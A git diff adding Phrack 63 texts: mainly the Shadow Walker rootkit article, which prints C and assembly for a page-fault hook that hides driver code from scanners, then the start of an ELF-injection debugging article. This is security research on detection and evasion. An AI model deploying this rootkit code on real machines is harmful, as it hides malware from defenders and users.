+containing a view of code from another 'innocent' driver.  This would imply
+that it is possible to spoof both signature scanners and integrity         
+monitors.  Indeed, an architectural feature of the Pentium architecture    
+makes it possible for a rootkit to perform this little trick with a minimal
+impact on overall system performance.  We describe the details in the next 
+section.                                                                   
+      
+----[ 3.1 - Hiding Executable Code                                         
+      
+Ironically, the general  methodology  we are about to discuss is an        
+offensive extension of an existing stack overflow protection scheme known  
+as PaX. We briefly discuss the PaX implementation in 3.3 under related    
+work. 
+
+In order to hide executable code, there are at least 3 underlying issues
+which must be addressed:
+
+1. We need a way to filter execute and read / write accesses.
+2. We need a way to "fake" the read / write memory accesses
+   when we detect them.
+3. We need to ensure that performance is not adversly affected.
+
+The first issue concerns how to filter execute accesses from read / write
+accesses. When virtual memory is enabled, memory access restrictions are
+enforced by setting bits in the page table entry which specify whether a
+given page is read-only or read-write. Under the IA-32 architecture,
+however, all pages are executable.  As such, there is no official way to
+filter execute accesses from read / write accesses and thus enforce the 
+execute-only / diverted read-write semantics necessary for this scheme 
+to work.  We can, however, trap and filter memory accesses by marking their
+PTE's non present and hooking the page fault handler.  In the page fault
+handler we have access to the saved instruction pointer and the faulting
+address. If the instruction pointer equals the faulting address, then it is
+an execute access.  Otherwise, it is a read / write.  As the OS uses the
+present bit in memory management, we also need to differentiate between
+page faults due to our memory hook and normal page faults.  The simplest
+way is to require that all hooked pages either reside in non paged memory
+or be explicitly locked down via an API like MmProbeAndLockPages. 
+
+The next issue concerns how to "fake" the EXECUTE and READ / WRITE accesses
+when we detect them (and do so with a minimal performance hit). In this 
+case, the Pentium TLB architecture comes to the rescue.  The pentium
+possesses a split TLB with one TLB for instructions and the other for data.
+As mentioned previously, the TLB caches the virtual to physical page frame 
+mappings when virtual memory is enabled.  Normally, the ITLB and DTLB are  
+synchronized and hold the same physical mapping for a given page. Though   
+the TLB is primarily hardware controlled, there are several software       
+mechanisms for manipulating it.                                            
+      
+  - Reloading cr3 causes all TLB entries except global entries to be 
+    flushed. This typically occurs on a context switch.                    
+  - The invlpg causes a specific TLB entry to be flushed.                  
+  - Executing a data access instruction causes the DTLB to be loaded with
+    the mapping for the data page that was accessed.                       
+  - Executing a call causes the ITLB to be loaded with the mapping for the 
+    page containing the code executed in response to the call.             
+  
+We can filter execute accesses from read / write accesses and fake them by 
+desynchronizing the TLB's such that the ITLB holds a different virtual to  
+physical mapping than the DTLB.  This process is performed as follows:
+
+First, a new page fault handler is installed to handle the cloaked page
+accesses.  Then the page-to-be-hooked is marked not present and it's 
+TLB entry is flushed via the invlpg instruction. This ensures that all  
+subsequent  accesses to the page will be filtered through the installed    
+page fault handler.  Within the installed page fault handler, we determine 
+whether a given memory access is due to an execute or read/write by 
+comparing the saved instruction pointer with the faulting address.  If they
+match, the memory access is due to an execute.  Otherwise, it is due to a 
+read / write.  The type of access determines which mapping is manually 
+loaded into the ITLB or DTLB.  Figure 5 provides a conceptual view  
+of this strategy. 
+
+Lastly, it is important to note that TLB access is much faster than                  
+performing a page table lookup. In general, page faults are costly.
+Therefore, at first glance, it might appear that marking the hidden pages  
+not present would incur a significant performance hit. This is, in fact,
+not the case. Though we mark the hidden pages not present, for most memory
+accesses we do not incur the penalty of a page fault because the entries 
+are cached in the TLB. The exceptions are, of course, the initial faults
+that occur after marking the cloaked page not present and any subsequent
+faults which result from cache line evictions when a TLB set becomes full.
+Thus, the primary job of the new page fault handler is to explicitly and
+selectively load the DTLB or ITLB with the correct mappings for hidden
+pages. All faults originating on other pages are passed down to the
+operating system page fault handler.    
+   
+   
+                                                     +-------------+ 
+                                        rootkit code |   FRAME 1   |  
+      Is it a +-----------+           /------------->|             |       
+       code   |           |           |              |-------------|       
+      access? |   ITLB    |           |              |   FRAME 2   |       
+      /------>|-----------|-----------/              |             |       
+      |       |  VPN=12   |                          |-------------|       
+      |       |  Frame=1  |                          |   FRAME 3   |       
+      |       +-----------+                          |             |       
+      |                           +-------------+    |-------------|       
+   MEMORY                         | PAGE TABLES |    |   FRAME 4   |       
+   ACCESS                         +-------------+    |             |       
+   VPN=12                                            |-------------|       
+      |                                              |   FRAME 5   |       
+      |       +-----------+                          |             |       
+      |       |           |                          |-------------|       
+      |       |   DTLB    |           random garbage |   FRAME 6   |       
+      |------>|------------------------------------->|             |       
+      Is it a |  VPN=12   |                          |-------------|       
+        data  |  Frame=6  |                          |   FRAME N   |       
+      access? +-----------+                          |             |       
+                                                     +-------------+       
+   
+   [ Figure 5 - Faking Read / Writes by Desynchronizing the Split TLB ]    
+  
+----[ 3.2 - Hiding Pure Data                                               
+      
+Hiding data modifications is significantly less optimal than hiding code   
+modifications, but it can be accomplished provided that one is willing to  
+accept the performance hit.  We cause a minimal performance loss when      
+hiding executable code by virtue of the fact that the ITLB can maintain a  
+different mapping than the DTLB. Code can execute very fast with a minimum 
+of page faults because that mapping is always present in the ITLB (except  
+in the rare event the ITLB entry gets evicted from the cache).             
+Unfortunately, in the case of data we can't introduce any such             
+inconsistency. There is only 1 DTLB and consequently that DTLB has to be   
+kept empty if we are to catch and filter specific data accesses. The end   
+result is 1 page fault per data access. This is not be a big problem in    
+terms of hiding a specific driver if the driver is carefully designed and  
+uses a minimum of global data, but the performance hit could be formidable 
+when trying to hide a frequently accessed data page.
+
+For data hiding, we have used a protocol based approach between the hidden 
+driver and the memory hook. We use this to show how one might hide global
+data in a rootkit driver.  In order to allow the memory access to go throug
+the DTLB is loaded in the page fault handler.  In order to enforce the 
+correct filtering of data accesses, however, it must be flushed immediately
+by the requesting driver to ensure that no other code accesses that memory 
+address and receives the data resulting from an incorrect mapping.         
+The protocol for accessing data on a hidden page is as follows:          
+
+1. The driver raises the IRQL to DISPATCH_LEVEL (to ensure that no other
+   code gets to run which might see the "hidden" data as opposed to the    
+   "fake" data).
+                                                          
+2. The driver must explicitly flush the TLB entry for the page containing  
+   the cloaked variable using the invlpg instruction. In the event that    
+   some other process has attempted to access our data page and been       
+   served with the fake frame (i.e. we don't want to receive the fake  
+   mapping which may still reside in the TLB so we clear it to be sure). 
+                
+3. The driver is allowed to perform the  data access.      
+                
+4. The driver must explicitly flush the TLB entry for the page containing  
+   the cloaked variable using the invlpg instruction (i.e. so that the     
+   "real" mapping does not remain in the TLB. We don't want any other      
+   drivers or processes receiving the hidden mapping so we clear it).
+    
+5. The driver lowers the IRQL to the previous level before it was raised.  
+                                                    
+The additional restriction also applies:                                   
+      
+  - No global data can be passed to kernel API functions. When calling an
+    API, global data must be copied into local storage on the stack and
+    passed into the API function (i.e. if the API accesses the cloaked
+    variable it will receive fake data and perform incorrectly).
+
+This protocol can be efficiently implemented in the hidden driver by having
+the driver copy all global data over into local variables at the beginning 
+of the routine and then copy the data back after the function body has     
+completed executing. Because stack data is in a constant state of flux, it 
+is unlikely that a signature could be reliably obtained from  global data  
+on the stack. In this way, there is no need to cause a page fault on every 
+global access. In general, only one page fault is required to copy over the
+data at the beginning of the routine and one fault to copy the data back at
+the end of the routine. Admittedly, this disregards more complex issues    
+involved with multithreaded access and synchronization. An alternative
+approach to using a protocol between the driver and PF handler would
+be to single step the instruction causing the memory access. This would
+be less cumbersome for the driver and yet allow the PF handler to maintain
+control of the DTLB (ie. to flush it after the data access so that it 
+remains empty).
+                   
+----[ 3.3 - Related Work                                                   
+      
+Ironically, the memory cloaking technology discussed in this article is  
+derived from an existing stack overflow protection scheme  known as PaX .  
+As such, we demonstrate a potentially offensive application of an  
+originally defensive technology. Though very similar (i.e. taking advantage
+of the Pentium split TLB architecture), there are subtle differences       
+between PaX and the rootkit application of the technology.  Whereas our    
+memory cloaked rootkit enforces execute, diverted read / write semantics,  
+PaX enforces read / write, no execute semantics.  This enables PaX to      
+provide software support for a non executable stack under the IA-32        
+architecture, thereby thwarting a large class of stack based buffer        
+overflow attacks.  When a PaX protected system detects an attempted execute 
+in a read / write only range of memory, it terminates the offending        
+process. Hardware support for non executable memory has subsequently been  
+added to the page table entry format for some processors including IA-64
+and pentium 4.  In contrast to PaX, our rootkit handler allows              
+execution to proceed normally while diverting  read / write accesses to     
+the hidden page off to an innocent appearing shadow page. Finally, it should
+be noted that PaX uses the PTE user / supervisor bit to generate the
+page faults required to enforce its protection. This limits it to protection
+of solely user mode pages which is an impractical limitation for a
+kernel mode rootkit. As such, we use the PTE present / not present bit
+in our implementation.      
+      
+----[ 3.4 - Proof Of Concept Implementation                                
+      
+Our current implementation uses a modified FU rootkit and a new page fault 
+handler called Shadow Walker. Since FU alters kernel data structures to    
+hide processes and does not utilize any code hooks, we only had to be      
+concerned with hiding the FU driver in memory. The kernel accounts for     
+every process running on the system by storing an object called an EPROCESS 
+block for each process in an internal linked list. FU disconnects the      
+process it wants to hide from this linked list. 
+      
+------[ 3.4.a - Modified FU Rootkit                                        
+      
+We modified the current version of the FU rootkit taken from rootkit.com.  
+In order to make it more stealthy, its dependence on a userland            
+initialization program was removed. Now, all setup information in the form 
+of OS dependant offsets are derived with a kernel level function. By       
+removing the userland portion, we eliminated the need to create a symbolic 
+link to the driver and the need to create a functional device, both of     
+which are easily detected. Once FU is installed, its image on the file    
+system can be deleted so all anti-virus scans on the file system will fail 
+to find it. You can also imagine that FU could be installed from a kernel 
+exploit and loaded into memory thereby avoiding any image on disk          
+detection. Also, FU hides all processes whose names are prefixed with     
+_fu_ regardless of the process ID (PID). We create a System thread that  
+continually scans this list of processes looking for this prefix. FU and  
+the memory hook, Shadow Walker, work in collusion; therefore, FU relies on  
+Shadow Walker to remove the driver from the linked list of drivers in      
+memory and from the Windows Object Manager's driver directory.             
+      
+----[ 3.4.b - Shadow Walker Memory Hook Engine                             
+      
+Shadow Walker consists of a memory hook installation module and a new page 
+fault handler.  The memory hook module takes the virtual address of the    
+page to be hidden as a parameter.  It uses the information contained in the 
+address to perform a few sanity checks. Shadow Walker then installs the new
+page fault handler by hooking Int 0E (if it has not been previously 
+installed) and inserts the information about the hidden page into a hash 
+table so that it can be looked up quickly on page faults. Lastly, the PTE 
+for the page is marked non present and the TLB entry for the hidden page 
+is flushed.  This ensures that all subsequent accesses to the page are 
+filtered by the new page fault handler. 
+
+/*************************************************************************  
+* HookMemoryPage - Hooks a memory page by marking it not present           
+*                  and flushing any entries in the TLB. This ensure        
+*                  that all subsequent memory accesses will generate       
+*                  page faults and be filtered by the page fault handler.  
+*     
+* Parameters:                                                              
+*      PVOID pExecutePage - pointer to the page that will be used on 
+*                           execute access
+*                                                        
+*      PVOID pReadWritePage - pointer to the page that will be used to load 
+*                             the DTLB on data access              *        
+*                            
+*      PVOID pfnCallIntoHookedPage - A void function which will be called  
+*                                    from within the page fault handler to 
+*                                    to load the ITLB on execute accesses  
+*
+*      PVOID pDriverStarts (optional) - Sets the start of the valid range 
+*                                       for data accesses originating from 
+*                                       within the hidden page. 
+*                 
+*      PVOID pDriverEnds (optional) - Sets the end of the valid range for  
+*                                     data accesses originating from within
+*                                     the hidden page.                    
+* Return - None                                                            
+**************************************************************************/ 
+void HookMemoryPage( PVOID pExecutePage, PVOID pReadWritePage, 
+                     PVOID pfnCallIntoHookedPage, PVOID pDriverStarts, 
+                     PVOID pDriverEnds )                          
+{                   
+        HOOKED_LIST_ENTRY HookedPage = {0};                                 
+        HookedPage.pExecuteView = pExecutePage;                             
+        HookedPage.pReadWriteView = pReadWritePage;                        
+        HookedPage.pfnCallIntoHookedPage = pfnCallIntoHookedPage;           
+        if( pDriverStarts != NULL)                                          
+           HookedPage.pDriverStarts = (ULONG)pDriverStarts;           
+        else 
+           HookedPage.pDriverStarts = (ULONG)pExecutePage;  
+
+        if( pDriverEnds != NULL)
+           HookedPage.pDriverEnds = (ULONG)pDriverEnds;                             
+        else                                                               
+        {       //set by default if pDriverEnds is not specified           
+                if( IsInLargePage( pExecutePage ) )                        
+                   HookedPage.pDriverEnds = 
+                   (ULONG)HookedPage.pDriverStarts + LARGE_PAGE_SIZE; 
+                else          
+                   HookedPage.pDriverEnds = 
+                   (ULONG)HookedPage.pDriverStarts + PAGE_SIZE;       
+        }//end if                                                          
+        
+        __asm cli //disable interrupts                                     
+        
+        if( hooked == false )                                              
+        {      HookInt( &g_OldInt0EHandler, 
+                      (unsigned long)NewInt0EHandler, 0x0E ); 
+               hooked = true;                                              
+        }//end if                                                          
+        
+        HookedPage.pExecutePte = GetPteAddress( pExecutePage );            
+        HookedPage.pReadWritePte = GetPteAddress( pReadWritePage ); 
+       
+        //Insert the hooked page into the list                             
+        PushPageIntoHookedList( HookedPage ); 
+                             
+        //Enable the global page feature    
+        EnableGlobalPageFeature( HookedPage.pExecutePte );                 
+        
+        //Mark the page non present                                        
+        MarkPageNotPresent( HookedPage.pExecutePte );  
+                    
+        //Go ahead and flush the TLBs.  We want to guarantee that all      
+        //subsequent accesses to this hooked page are filtered 
+        //through our new page fault handler.                              
+        __asm invlpg pExecutePage       
+                                   
+        __asm sti //reenable interrupts                             
+}//end HookMemoryPage  
+                                                    
+The functionality of the page fault handler is relatively straight forward 
+despite the seeming complexity of the scheme.  Its primary functions are 
+to determine if a given page fault is originating from a hooked page, 
+resolve the access type, and then load the appropriate TLB. As such, the 
+page fault handler has basically two execution paths.  If the page is 
+unhooked, it is passed down to the operating system page fault handler. 
+This is determined as quickly and efficiently as possible.  Faults 
+originating from user mode addresses or while the processor is running in 
+user mode are immediately passed down. The fate of kernel mode accesses is 
+also quickly decided via a hash table lookup. Alternatively, once the page 
+has been determined to be hooked the access type is checked and directed to
+the appropriate TLB loading code (Execute accesses will cause a ITLB load 
+while Read / Write accesses cause a DTLB load). The procedure for TLB 
+loading is as follows:
+        
+1. The appropriate physical frame mapping is loaded into the PTE for the   
+   faulting address.                                                       
+2. The page is temporarily marked present.                                 
+3. For a DTLB load, a memory read on the hooked page is performed.         
+4. For an ITLB load, a call into the hooked page is performed.             
+5. The page is marked as non present again.                                
+6. The old physical frame mapping for the PTE is restored.                 
+      
+After TLB loading, control is directly returned to the faulting code. 
+
+                                                                
+/**************************************************************************
+* NewInt0EHandler - Page fault handler for the memory hook engine (aka. the
+*                   guts of this whole thing ;) 
+*                                                               
+* Parameters - none                                             
+*                                                               
+* Return -      none                                            
+*                                                               
+***************************************************************************
+void __declspec( naked ) NewInt0EHandler(void)                  
+{                                                               
+        __asm                                                   
+        {                                                       
+                pushad                                          
+                mov edx, dword ptr [esp+0x20] //PageFault.ErrorCode        
+                                                                
+                test edx, 0x04 //if the processor was in user mode, then   
+                jnz PassDown   //pass it down                              
+                                                                
+                mov eax,cr2     //faulting virtual address      
+                cmp eax, HIGHEST_USER_ADDRESS                   
+                jbe PassDown   //we don't hook user pages, pass it down    
+                                                                
+                ////////////////////////////////////////        
+                //Determine if it's a hooked page               
+                /////////////////////////////////////////       
+                push eax                                        
+                call FindPageInHookedList                       
+                mov ebp, eax //pointer to HOOKED_PAGE structure            
+                cmp ebp, ERROR_PAGE_NOT_IN_LIST                 
+                jz PassDown  //it's not a hooked page           
+                                                                
+                ///////////////////////////////////////         
+                //NOTE: At this point we know it's a            
+                //hooked page. We also only hook                
+                //kernel mode pages which are either            
+                //non paged or locked down in memory            
+                //so we assume that all page tables             
+                //are resident to resolve the address           
+                //from here on out.                             
+                /////////////////////////////////////           
+                mov eax, cr2                                    
+                mov esi, PROCESS_PAGE_DIR_BASE                  
+                mov ebx, eax                                    
+                shr ebx, 22                                     
+                lea ebx, [esi + ebx*4]  //ebx = pPTE for large page        
+                test [ebx], 0x80        //check if its a large page
+                jnz IsLargePage                                 
+                                                                
+                mov esi, PROCESS_PAGE_TABLE_BASE                
+                mov ebx, eax                                     
+                shr ebx, 12                                     
+                lea ebx, [esi + ebx*4]  //ebx = pPTE            
+                                                                
+IsLargePage:                                                    
+                                                                
+                cmp [esp+0x24], eax     //Is due to an attepmted execute?
+                jne LoadDTLB                                    
+                                                                
+                ////////////////////////////////                
+                // It's due to an execute. Load                 
+                // up the ITLB.                                 
+                ///////////////////////////////                 
+                cli                       
+                or dword ptr [ebx], 0x01         //mark the page present 
+                call [ebp].pfnCallIntoHookedPage //load the itlb         
+                and dword ptr [ebx], 0xFFFFFFFE  //mark page not present 
+                sti                                             
+                jmp ReturnWithoutPassdown                       
+                                                                
+                ////////////////////////////////                
+                // It's due to a read /write                    
+                // Load up the DTLB                             
+                ///////////////////////////////                 
+                ///////////////////////////////                 
+                // Check if the read / write                    
+                // is originating from code                     
+                // on the hidden page.                          
+                ///////////////////////////////                 
+LoadDTLB:                                                       
+                mov edx, [esp+0x24]             //eip           
+                cmp edx,[ebp].pDriverStarts                     
+                jb LoadFakeFrame                                
+                cmp edx,[ebp].pDriverEnds                       
+                ja LoadFakeFrame                                
+                                                                
+                /////////////////////////////////               
+                // If the read /write is originating            
+                // from code on the hidden page,then            
+                // let it go through. The code on the           
+                // hidden  page will follow protocol            
+                // to clear the TLB after the access.           
+                ////////////////////////////////                
+                cli                                             
+                or dword ptr [ebx], 0x01           //mark the page present
+                mov eax, dword ptr [eax]           //load the DTLB        
+                and dword ptr [ebx], 0xFFFFFFFE    //mark page not present
+                sti                                             
+                jmp ReturnWithoutPassdown                       
+                                                                
+                /////////////////////////////////               
+                // We want to fake out this read                
+                // write. Our code is not generating            
+                // it.                                          
+                /////////////////////////////////               
+LoadFakeFrame:                                                  
+                mov esi, [ebp].pReadWritePte                    
+                mov ecx, dword ptr [esi]            //ecx = PTE of the    
+                                                    //read / write page   
+                                                                
+                //replace the frame with the fake one                     
+                mov edi, [ebx]                                  
+                and edi, 0x00000FFF //preserve the lower 12 bits of the   
+                                    //faulting page's PTE                 
+                and ecx, 0xFFFFF000 //isolate the physical address in     
+                                    //the "fake" page's PTE               
+                or ecx, edi                                     
+                mov edx, [ebx]     //save the old PTE so we can replace it
+                cli       
+                mov [ebx], ecx    //replace the faulting page's phys frame
+                                  //address w/ the fake one               
+                                                                
+                //load the DTLB                                 
+                or dword ptr [ebx], 0x01   //mark the page present        
+                mov eax, cr2               //faulting virtual address     
+                mov eax, dword ptr[eax]    //do data access to load DTLB  
+                and dword ptr [ebx], 0xFFFFFFFE //re-mark page not present
+                                                                
+                //Finally, restore the original PTE             
+                mov [ebx], edx                                  
+                sti                                             
+                                                                
+ReturnWithoutPassDown:                                          
+                popad                                           
+                add esp,4                                       
+                iretd                                           
+                                                                
+PassDown:                                                       
+                popad                                           
+                jmp g_OldInt0EHandler                           
+                                                                
+        }//end asm                                              
+}//end NewInt0E                                                 
+
+                                         
+--[ 4 - Known Limitations & Performance Impact  
+                           
+As our current rootkit is intended only as a proof of concept
+demonstration rather than a fully engineered attack tool, it possesses
+a number of implementational limitations.  Most of this functionality 
+could be added, were one so inclined.  First, there is no effort to
+support hyperthreading or multiple processor systems.  Additionally, 
+it does not support the Pentium PAE addressing mode which extends 
+the number of physically addressable bits from 32 to 36. Finally, the
+design is  limited to cloaking only 4K sized kernel mode pages 
+(i.e. in the upper 2 GB range of the memory address space). We mention
+the 4K page limitation because there are currently some technical 
+issues with regard to hiding the 4MB page upon which ntoskrnl resides.
+Hiding the page containing ntoskrnl would be a noteworthy extension.
+In terms of performance, we have not completed rigorous testing, but
+subjectively speaking there is no noticeable performance impact after 
+the rootkit and memory hooking engine are installed.  For maximum 
+performance, as mentioned previously, code and data should remain 
+on separate pages and the usage of global data should be minimized 
+to limit the impact on performance if one desires to enable both 
+data and executable page cloaking. 
+
+--[ 5 - Detection
+
+There are at least a few obvious weaknesses that must be dealt with to
+avoid detection. Our current proof of concept implementation does not 
+address them, however, we note them here for the sake of completeness. 
+Because we must be able to differentiate between normal page faults and 
+those faults related to the memory hook, we impose the requirement that
+hooked pages must reside in non paged memory. Clearly, non present pages
+in non paged memory present an abnormality. Weather or not this is a 
+sufficient heuristic to call a rootkit alarm is, however, debatable.  
+Locking down pagable memory using an API like MmProbeAndLockPages is 
+probably more stealthy. The next weakness lies in the need to disguise 
+the presence of the page fault handler.  Because the page where the page  
+fault handler resides cannot be marked non present due to the obvious 
+issues with recursive reentry, it will be vulnerable to a simple signature 
+scan and must be obsfucated using more traditional methods. Since this 
+routine is small, written in ASM, and does not rely upon any kernel API's, 
+polymorphism would be a reasonable solution.  A related weakness  
+arises in the need to disguise the presence of the IDT hook. We cannot use 
+our memory hooking technique to disguise the modifications to the  
+interrupt descriptor table for similar reasons as the page fault handler. 
+While we could hook the page fault interrupt via an inline hook rather
+than direct IDT modification, placing a memory hook on the page 
+containing the OS's INT 0E handler is problematic and inline hooks 
+are easily detected. Joanna Rutkowska proposed using the debug registers 
+to hide IDT hooks [5], but Edgar Barbosa demonstrated they are not a
+completey effective solution [12]. This is due to the fact that debug 
+registersprotect virtual as opposed to physical addresses. One may simply
+remap the physical frame containing the IDT to a different virtual address
+and read / write the IDT memory as one pleases. Shadow Walker falls prey 
+to this type of attack as well, based as it is, upon the exploitation 
+of virtual rather than physical memory. Despite this aknowleged 
+weakness, most commercial security scanners still perform virtual 
+rather than physical memory scans and will be fooled by rootkits like 
+Shadow Walker.  Finally, Shadow Walker is insidious. Even if a scanner 
+detects Shadow Walker, it will be virtually helpless to remove it on a 
+running system. Were it to successfully over-write the hook with the
+original OS page fault handler, for example, it would likely BSOD the 
+system because there would be some page faults occurring on the hidden
+pages which neither it nor the OS would know how to handle.
+                                                           
+--[ 6 - Conclusion                                                     
+      
+Shadow Walker is not a weaponized attack tool. Its functionality is 
+limited and it makes no effort to hide it's hook on the IDT or its page
+fault handler code. It provides only a practical proof of concept 
+implementation of virtual memory subversion. By inverting the defensive
+software implementation of non executalbe memory, we show that it is
+possible to subvert the view of virtual memory relied upon by the 
+operating system and almost all security scanner applications. Due to its
+exploitation of the TLB architecture, Shadow Walker is transparent and 
+exhibits an extremely light weight performance hit.  Such characteristics
+will no doubt make it an attractive solution for viruses, worms, and 
+spyware applications in addition to rootkits.      
+      
+--[ 7 - References 
+
+1. Tripwire, Inc. http://www.tripwire.com/
+2. Butler, James, VICE - Catch the hookers! Black Hat, Las Vegas, July, 
+   2004. www.blackhat.com/presentations/bh-usa-04/bh-us-04-butler/
+   bh-us-04-butler.pdf
+3. Fuzen, FU Rootkit. http://www.rootkit.com/project.php?id=12
+4. Holy Father, Hacker Defender. http://hxdef.czweb.org/
+5. Rutkowska, Joanna, Detecting Windows Server Compromises with Patchfinder
+   2. January, 2004.
+6. Butler, James and Hoglund, Greg, Rootkits: Subverting the Windows 
+   Kernel. July, 2005. 
+7. B. Cogswell and M. Russinovich, RootkitRevealer, available at: 
+   www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml
+8. F-Secure BlackLight (Helsinki, Finland: F-Secure Corporation, 2005): 
+   www.fsecure.com/blacklight/
+9. Jack, Barnaby. Remote Windows Exploitation: Step into the Ring 0
+   http://www.eeye.com/~data/publish/whitepapers/research/
+   OT20050205.FILE.pdf
+10. Chong, S.K. Windows Local Kernel Exploitation. 
+    http://www.bellua.com/bcs2005/asia05.archive/
+    BCSASIA2005-T04-SK-Windows_Local_Kernel_Exploitation.ppt
+11. William A. Arbaugh, Timothy Fraser, Jesus Molina, and Nick L. Petroni: 
+    Copilot: A Coprocessor Based Runtime Integrity Monitor. Usenix Security
+    Symposium 2004. 
+12. Barbosa, Edgar. Avoiding Windows Rootkit Detection
+    http://packetstormsecurity.org/filedesc/bypassEPA.pdf
+13. Rutkowska, Joanna. Concepts For The Stealth Windows Rootkit, Sept 2003
+    http://www.invisiblethings.org/papers/chameleon_concepts.pdf 
+14. Russinovich, Mark and Solomon, David. Windows Internals, Fourth 
+    Edition.           
+
+--[ 8 - Aknowlegements
+
+Thanks and aknowlegements go to Joanna Rutkowska for her Chamelon Project 
+paper as it was one of the inspirations for this project, to the PAX team
+for showing how to desynchronize the TLB in their software implementation
+of non executable memory, to Halvar Flake for our inital discussions 
+of the Shadow Walker idea, and to Kayaker for helping beta test and debug
+some of the code. We would finally like to extend our greetings to
+all of the contributors on rootkit.com :)                                  
+      
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack63/9.txt b/phrack63/9.txt
new file mode 100644
index 0000000..73e056a
--- /dev/null
+++ b/phrack63/9.txt
@@ -0,0 +1,3600 @@
+                             ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x09 of 0x14
+
+|=------=[ Embedded ELF Debugging : the middle head of Cerberus ]=------=|
+|=----------------------------------------------------------------------=|
+|=------------=[ The ELF shell crew <elfsh@devhell.org> ]=--------------=|
+|=----------------------------------------------------------------------=|
+
+
+I. Hardened software debugging introduction
+     a. Previous work & limits
+     b. Beyond PaX and ptrace()		
+     c.	Interface improvements
+II. The embedded debugging playground
+     a. In-process injection
+     b. Alternate ondisk and memory ELF scripting (feat. linkmap)
+     c. Real debugging : dumping, backtrace, breakpoints
+     d. A note on dynamic analyzers generation 
+III. Better multiarchitecture ELF redirections
+     a. CFLOW: PaX-safe static functions redirection		
+     b. ALTPLT technique revised				
+     c. ALTGOT technique : the RISC complement			
+     d. EXTPLT technique : unknown function postlinking
+     e. IA32, SPARC32/64, ALPHA64, MIPS32 compliant algorithms		 
+V. Constrained Debugging
+     a. ET_REL relocation in memory				
+     b. ET_REL injection for Hardened Gentoo (ET_DYN + pie + ssp)
+     c. Extending static executables				
+     d. Architecture independant algorithms
+VI. Past and present
+VII. Greetings  
+VIII. References
+
+
+
+-------[ I. Hardened software debugging introduction
+	 
+	 
+	      In the past, binary manipulation work has focussed on virii
+	 writing, software cracking, backdoors deployment, or creation of 
+	 tiny or obfuscated executables. Besides the tools from the GNU 
+	 project such as the GNU binutils that includes the GNU debugger [1] 
+	 (which focus more on portability than functionalities), no major 
+	 binary manipulation framework does exist. For almost ten years, 
+	 the ELF format has been a success and most UNIX Operating Systems 
+	 and distributions rely on it. 
+
+	 However, the existing tools do not take advantage of the format 
+	 and most of the reverse engineering or debugging softwares are 
+	 either very architecture specific, or simply do not care about 
+	 binary internals for extracting and redirecting information.
+
+	 Since our first published work on the ELF shell, we improved so
+	 much the new framework that it is now time to publish a second
+	 deep article focussing on advances in static and runtime	
+	 ELF techniques. We will explain in great details the 8 new
+	 binary manipulation functionalities that intersect with the 
+	 existing reverse engineering methodology. Those techniques allow 
+	 for a new type of approach on debugging and extending closed 
+	 source software in hardened environments.
+
+	 We worked on many architectures (x86, alpha, sparc, mips) and 
+	 focussed on constrained environments where binaries are linked 
+	 for including security protections (such as hardened gentoo 
+	 binaries) in PaX [2] protected machines. It means that our 
+	 debugger can stay safe if it is injected inside a (local or) 
+	 remote process.
+
+
+----[ A. Previous work & limits
+
+
+	 In the first part of the Cerberus articles serie, we introduced 
+	 a new residency technique called ET_REL injection. It consisted 
+	 in compiling C code into relocatable (.o) files and injecting
+	 them into existing closed source binary programs. This technique 
+	 was proposed for INTEL and SPARC architectures on the ELF32 
+	 format. 
+
+	 We improved this technique so that both 32 and 64 bits binaries 
+	 are supported so we added alpha64 and sparc64 support. We also 
+	 worked on the MIPS r5000 architecture and now provide a nearly 
+	 complete environment for it as well. We now also allow for ET_REL
+	 injection into ET_DYN objects (shared libraries) so that our 
+	 technique is compatible with fully randomized environments such 
+	 as provided by Hardened Gentoo with the PaX protection enabled
+	 on the Linux Operating System. We also worked on other OS such as
+	 BSD based ones, Solaris, and HP-UX and the code was compiled and
+	 tested regulary on those as well.
+
+	 A major innovation of our binary manipulation based debugging 
+	 framework is the absence of ptrace. We do not use kernel residency 
+	 like in [8] so that even unprivilegied users can use this and it 
+	 is not Operating System dependent.
+
+	 Existing debuggers use to rely on the ptrace system call so that 
+	 the debugger process can attach the debuggee program and enable 
+	 various internal processes manipulations such as dumping memory, 
+	 putting breakpoints, backtracing, and so on. We propose the same 
+	 features without using the system call.
+	 
+	 The reasons why we do not use ptrace are multiple and simple. 
+	 First of all, a lot of hardened or embedded systems do not 
+	 implement it, or just disable it. That's the case for grsecurity 
+	 based systems, production systems, or phone systems whoose 
+	 Operating System is ELF based but without a ptrace interface. 
+
+	 The second major reason for not using ptrace is the performance 
+	 penalties of such a debugging system. We do not suffer from 
+	 performance penalties since the debugger resides in the same 
+	 process. We provide a full userland technique that does not have 
+	 to access the kernel memory, thus it is useful in all stages of 
+	 a penetration testing when debugging sensitive software on 
+	 hardened environment is needed and no system update is possible. 
+
+	 We allow for plain C code injection inside new binary files (in 
+	 the static perspective) and processes (in the runtime mode) using 
+	 a unified software. When requested, we only use ELF techniques that
+	 reduce forensics evidences on the disk and only works in memory.
+
+
+----[ B. Beyond PaX and ptrace
+
+
+	 Another key point in our framework are the greatly improved 
+	 redirection techniques. We can redirect almost all control flow, 
+	 wether or not the function code is placed inside the binary 
+	 itself (CFLOW technique) or in a library on which the binary 
+	 depends (Our previous work presented new hijacking techniques 
+	 such that ALTPLT). 
+
+	 We improved this techniques and passed through many rewrites 
+	 and now allow a complete architecture independant implementation. 
+	 We completed ALTPLT by a new technique called ALTGOT so that 
+	 hijacking a function and calling back the original copy from the 
+	 hooking function is possible on Alpha and Mips RISC machines as 
+	 well. 
+
+	 We also created a new technique called EXTPLT which allow for 
+	 unknown function (for which no dynamic linking information is 
+	 available at all in the ELF file) using a new postlinking 
+	 algorithm compatible with ET_EXEC and ET_DYN objets.
+
+
+----[ C. Interface improvements
+
+
+	 Our Embedded ELF debugger implementation is a prototype. 
+	 Understand that it is really usable but we are still in the 
+	 development process. All the code presented here is known to 
+	 work. However we are not omniscient and you might encounter a 
+	 problem. In that case, drop us an email so that we can figure 
+	 out how to create a patch. 
+
+	 The only assumption that we made is the ability to read the 
+	 debuggee program. In all case, you can also debug in memory 
+	 the unreadable binaries on disk by loading the debugger using
+	 the LD_PRELOAD variable.  Nevertheless, e2dbg is enhanced
+	 when binary files are readable. Because the debugger run in the 
+	 same address space, you can still read memory [3] [4] and 
+	 restore the binary program even though we do not implement it 
+	 yet.
+	 
+	 The central communication language in the Embedded ELF Debugger 
